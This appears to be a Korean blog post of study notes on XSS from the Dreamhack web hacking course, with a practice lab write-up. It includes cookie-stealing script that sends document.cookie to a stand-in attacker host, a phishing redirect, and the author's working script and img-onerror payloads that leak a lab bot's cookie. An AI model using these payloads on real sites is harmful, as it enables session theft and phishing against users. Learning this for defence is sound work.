STAGE 4 : Cross-Site-Scripting (XSS)
Cross-Site-Scripting (XSS)
> ClientSide : XSS
XSS
: 클라이언트 사이드 취약점 중 하나로, 공격자가 웹 리소스에 악성 스크립트를 삽입해 이용자의 웹 브라우저에서 해당 스크립트를 실행할 수 있다. 공격자는 해당 취약점을 통해 특정 계정의 세션 정보를 탈취하고 해당 계정으로 임의의 기능을 수행할 수 있다.
- XSS 발생 예시와 종류
⋅ XSS 공격은 이용자가 삽입한 내용을 출력하는 기능에서 발생한다.
⋅ 클라이언트는 HTTP 형식으로 웹 서버에 리소스를 요청하고 서버로부터 받은 응답, 즉 HTML, CSS, JS 등의 웹 리소스를 시각화하여 이용자에게 보여준다.
⋅ HTML, CSS, JS와 같은 코드가 포함된 게시물을 조회할 경우 이용자는 변조된 페이지를 보거나 스크립트가 실행될 수 있다.
- 발생 형태에 따른 종류
| Stored XSS | XSS에 사용되는 악성 스크립트가 서버에 저장되고 서버의 응답에 담겨오는 XSS |
| Reflected XSS | XSS에 사용되는 악성 스크립트가 URL에 삽입되고 서버의 응답에 담겨오는 XSS |
| DOM-based XSS | XSS에 사용되는 악성 스크립트가 URL Fragment에 삽입되는 XSS |
| Universal XSS | 클라이언트의 브라우저 혹은 브라우저의 플러그인에서 발생하는 취약점으로 SOP 정책을 우회하는 XSS |
- XSS 스크립트의 예시
자바스크립트 : 웹 문서의 동작을 정의
⋅ 이용자가 버튼 클릭 시에 어떤 이벤트를 발생시킬지와 데이터 입력 시 해당 데이터를 전송하는 이벤트를 구현할 수 있다. ⋅ 이용자와의 상호 작용 없이 이용자의 권한으로 정보를 조회하거나 변경하는 등의 행위가 가능하다.
⋅ 이러한 행위가 가능한 이유는 이용자를 식별하기 위한 세션 및 쿠키가 웹 브라우저에 저장되어 있기 때문이다.
=> 자바스크립트를 통해 이용자에게 보여지는 웹 페이지를 조작하거나, 웹 브라우저의 위치를 임의의 주소로 변경할 수 있다.
- 쿠키 및 세션 탈취 공격 코드
<script>
// "hello" 문자열 alert 실행.
alert("hello");
// 현재 페이지의 쿠키(return type: string)
document.cookie;
// 현재 페이지의 쿠키를 인자로 가진 alert 실행.
alert(document.cookie);
// 쿠키 생성(key: name, value: test)
document.cookie = "name=test;";
// new Image() 는 이미지를 생성하는 함수이며, src는 이미지의 주소를 지정. 공격자 주소는 http://hacker.dreamhack.io
// "http://hacker.dreamhack.io/?cookie=현재페이지의쿠키" 주소를 요청하기 때문에 공격자 주소로 현재 페이지의 쿠키 요청함
new Image().src = "http://hacker.dreamhack.io/?cookie=" + document.cookie;
</script>
- 페이지 변조 공격 코드
<script>
// 이용자의 페이지 정보에 접근.
document;
// 이용자의 페이지에 데이터를 삽입.
document.write("Hacked By DreamHack !");
</script>
- 위치 이동 공격 코드
<script>
// 이용자의 위치를 변경.
// 피싱 공격 등으로 사용됨.
location.href = "http://hacker.dreamhack.io/phishing";
// 새 창 열기
window.open("http://hacker.dreamhack.io/")
</script>
> Stored XSS
: 서버의 데이터베이스 또는 파일 등의 형태로 저장된 악성 스크립트를 조회할 때 발생하는 XSS
ex ) 게시물과 댓글에 악성 스크립트를 포함해 업로드하는 방식 -> 게시물은 불특정 다수에게 보여지기 때문에 해당 기능에서 XSS 취약점이 존재할 경우 높은 파급력을 가진다.
> Reflected XSS
: 서버가 악성 스크립트가 담긴 요청을 출력할 때 발생
ex ) 게시판 서비스에서 작성된 게시물을 조회하기 위한 검색창에서 스크립트를 포함해 검색하는 방식 -> 이용자가 게시물을 검색하면 서버에서는 검색 결과를 이용자에게 반환한다. 일부 서비스에서는 검색 결과를 응답에 포함하는데, 검색 문자열에 악성 스크립트가 포함되어 있다면 Reflected XSS가 발생할 수 있다.
⋅ Reflected XSS는 URL과 같은 이용자의 요청에 의해 발생한다.
⋅ 따라서 공격을 위해서는 타 이용자에게 악성 스크립트가 포함된 링크에 접속하도록 유도해야 한다.
⋅ 이용자에게 링크를 직접 전달하는 방법은 악성 스크립트 포함 여부를 이용자가 눈치챌 수 있기 때문에 주로 Click Jacking 또는 Open Redirect 등 다른 취약점과 연계하여 사용한다.
[함께실습] XSS
| / | 인덱스 페이지 |
| /vuln | 이용자가 입력한 값을 출력 |
| /memo | 이용자가 메모를 남길 수 있으며 작성한 메모를 출력 |
| /flag | 전달된 URL에 임의 이용자가 접속하게끔 한다. |
- vuln 함수
@app.route("/vuln")
def vuln():
param = request.args.get("param", "") # 이용자가 입력한 vuln 인자를 가져옴
return param # 이용자의 입력값을 화면 상에 표시이용자가 전달한 param 파라미터의 값을 출력
- memo 함수
@app.route('/memo') # memo 페이지 라우팅
def memo(): # memo 함수 선언
global memo_text # 메모를 전역변수로 참조
text = request.args.get('memo', '') # 사용가 전송한 memo 입력값을 가져옴
memo_text += text + '\n' # 사용가 전송한 memo 입력값을 memo_text에 추가
return render_template('memo.html', memo=memo_text) # 사이트에 기록된 memo_text를 화면에 출력이용자가 전달한 memo 파라미터 값을 render_template 함수를 통해 기록하고 출력
- flag 함수
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome("/chromedriver", options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'GET : 이용자에게 URL을 입력받는 페이지를 제공
POST : params 파라미터에 값과 쿠키에 FLAG를 포함해 check_xss 함수를 호출한다. check_xss는 read_url 함수를 호출해 vuln 엔드포인트에 접속한다.
> 취약점 분석
vuln과 memo 엔드포인트는 이용자의 입력값을 페이지에 출력한다. memo는 render_template 함수를 사용해 memo.html을 출력한다. render_template 함수는 전달된 템플릿 변수를 기록할 때 HTML 엔티티 코드로 변환해 저장하기 때문에 XSS가 발생하지 않는다. 그러나 vuln은 이용자가 입력한 값을 페이지에 그대로 출력하기 때문에 XSS가 발생한다.
@app.route("/vuln")
def vuln():
param = request.args.get("param", "") # 이용자가 입력한 vuln 인자를 가져옴
return param # 이용자의 입력값을 화면 상에 표시
> 익스플로잇
/vuln 엔드포인트에서 발생하는 XSS 취약점을 통해 임의 이용자의 쿠키를 탈취해야 한다.
탈취한 쿠키를 전달받기 위해서는 외부에서 접근 가능한 웹 서버를 사용하거나 문제에서 제공하는 memo 엔드포인트를 사용할 수 있다.
| 속성 | 설명 |
| location.href | 전체 URL을 반환하거나, URL을 업데이트할 수 있는 속성값이다 |
| document.cookie | 해당 페이지에서 사용하는 쿠키를 읽고, 쓰는 속성값이다. |
> 쿠키 탈취
- memo 페이지 사용
flag 엔드포인트에서 다음과 같은 익스플로잇 코드를 입력하면, memo 엔드포인트에서 임의 이용자의 쿠키 정보를 확인할 수 있다.
<script>location.href = "/memo?memo=" + document.cookie;</script>
- 웹 서버 사용
외부에서 접근 가능한 웹 서버를 통해 탈취한 쿠키를 확인할 수 있다. 해당 서비스(tools.dreamhack.games)에서 제공하는Request Bin 기능은 이용자의 접속기록을 저장하기 때문에 해당 정보를 확인할 수 있다. Request Bin 버튼을 클릭하면 랜덤한 URL이 생성되며, 해당 URL에 접속한 기록을 저장한다.
flag탭을 누르면 아래와 같이 나온다.
<script>location.href="/memo?memo="+document.cookie;</script>
를 입력해주었다.
memo 탭에서 flag를 확인할 수 있었다.
[혼자 실습] XSS
vuln(xss) page에서 script 태그가 작동하지 않았다.
그래서 img 태그를 사용해보았는데, 작동하였다.
http://host3.dreamhack.games:22513/vuln?param=%3Cimg%20src=%22img.jpg%22%3E
img 태그를 이용하여 flag탭에 입력해주었다.
<img src="img.jpg" onerror="location.href ='/memo?memo='+document.cookie"/>
다음과 같이 flag를 확인할 수 있었다.
'Web Hacking > Dreamhack' 카테고리의 다른 글
| [Dreamhack] Web Hacking STAGE 7 (0) | 2022.08.09 |
|---|---|
| [Dreamhack] Web Hacking STAGE 6 (0) | 2022.08.02 |
| [Dreamhack] Web Hacking STAGE 5 (0) | 2022.07.25 |
| [Dreamhack] Web Hacking STAGE 3 (0) | 2022.07.13 |
| [Dreamhack] Web Hacking STAGE 2 (0) | 2022.07.06 |